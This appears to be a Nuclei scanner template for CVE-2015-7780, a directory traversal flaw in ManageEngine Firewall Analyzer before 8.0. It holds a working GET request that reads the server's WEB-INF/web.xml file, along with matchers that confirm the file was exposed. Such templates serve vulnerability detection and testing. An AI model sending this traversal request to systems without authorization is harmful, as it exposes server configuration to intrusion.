id: CVE-2015-7780 info: name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal author: daffainfo severity: medium description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0. reference: - https://www.exploit-db.com/exploits/35933 - https://www.cvedetails.com/cve/CVE-2015-7780/ - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html - http://jvn.jp/en/jp/JVN21968837/index.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 tags: cve,cve2015,lfi,manageengine requests: - method: GET path: - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" - "java.sun.com" part: body condition: and - type: word part: header words: - "application/xml"